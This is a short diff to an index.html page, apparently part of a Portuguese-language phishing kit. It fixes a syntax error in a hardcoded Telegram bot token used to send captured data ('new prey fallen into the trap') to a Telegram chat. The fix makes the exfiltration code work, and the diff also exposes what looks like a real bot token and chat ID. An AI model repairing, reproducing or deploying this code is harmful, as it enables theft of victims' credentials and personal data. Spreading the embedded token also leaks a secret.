--- a/index.html
+++ b/index.html
@@ -129,7 +129,7 @@
             };
 
             // Envia para o Telegram
-            const botToken = '8028837254:AAE54NFBPdKikjofF1nXlnESCWzZbv-waSU;
+            const botToken = '8028837254:AAE54NFBPdKikjofF1nXlnESCWzZbv-waSU';
             const chatId = '8028837254';
             
             const message = `🐺 NOVA PRESA CAÍDA NA TRAP 🐺
